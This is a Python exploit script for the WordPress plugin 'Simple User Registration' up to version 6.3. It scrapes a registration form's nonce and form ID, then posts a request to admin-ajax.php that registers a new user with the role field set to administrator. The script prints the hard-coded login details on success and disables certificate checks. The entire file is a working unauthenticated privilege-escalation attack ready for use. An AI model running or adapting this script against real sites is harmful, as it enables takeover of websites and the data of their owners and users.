import requests
import argparse
import re
from urllib.parse import urljoin

# By: Khaled_alenazi (Nxploited)

def extract_form_details(form_page_url):
    try:
        response = requests.get(form_page_url, verify=False, timeout=10)
        if response.status_code != 200:
            print(f"[-] Failed to load form page: HTTP {response.status_code}")
            return None, None, None

        nonce = re.search(r'name=["\']wpr_nonce["\'][^>]*value=["\']([^"\']+)["\']', response.text)
        form_id = re.search(r'name=["\']wpr_form_id["\'][^>]*value=["\'](\d+)["\']', response.text)

        if not nonce or not form_id:
            print("[-] Failed to extract nonce or form_id from page.")
            return None, None, None

        referer_path = "/" + "/".join(form_page_url.split("/", 3)[-1].split("/"))
        return nonce.group(1), form_id.group(1), referer_path

    except Exception as e:
        print(f"[-] Exception while fetching form details: {e}")
        return None, None, None

def Nxploited(base_url, form_url):
    nonce, form_id, referer = extract_form_details(form_url)

    print(f"[i] Extracted Nonce   : {nonce}")
    print(f"[i] Extracted Form ID : {form_id}")
    print(f"[i] Referer Path      : {referer}")

    if not nonce or not form_id or not referer:
        print("[-] Exploit failed during form extraction.")
        return

    endpoint = urljoin(base_url, "wp-admin/admin-ajax.php")

    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest"
    }

    data = {
        "action": "wpr_submit_form",
        "wpr_form_id": form_id,
        "wpr_nonce": nonce,
        "_wp_http_referer": referer,
        "wpr[wp_field][user_login]": "Nxploitedadmin",
        "wpr[wp_field][first_name]": "Nxploitedadmin",
        "wpr[wp_field][last_name]": "Nxploitedadmin",
        "wpr[wp_field][user_email]": "test@admin.ksa",
        "wpr[wp_field][password]": "nxp1234",
        "wpr[wp_field][confirm_password]": "nxp1234",
        "wpr[wp_field][role]": "administrator"
    }

    try:
        response = requests.post(endpoint, headers=headers, data=data, verify=False, timeout=10)
        print(f"[i] HTTP Response Code : {response.status_code}")
        print(f"[i] Server Response    : {response.text.strip()[:300]}")

        if "success" in response.text and "user_id" in response.text:
            print("\n[+] Exploitation Successful")
            print("[+] Username   : Nxploitedadmin")
            print("[+] First Name : Nxploitedadmin")
            print("[+] Last Name  : Nxploitedadmin")
            print("[+] Email      : test@admin.ksa")
            print("[+] Password   : nxp1234")
            print("[+] Role       : administrator")
            print("\nExploit By : Khaled_alenazi (Nxploited)")
        else:
            print("[-] Exploit failed.")

    except Exception as e:
        print(f"[-] Exception while sending exploit request: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)")
    parser.add_argument("-u", "--url", required=True, help="Base WordPress URL (e.g. http://localhost/wordpress/)")
    parser.add_argument("--form", required=True, help="Full URL of the page that contains the registration form")
    args = parser.parse_args()

    requests.packages.urllib3.disable_warnings()
    Nxploited(args.url, args.form)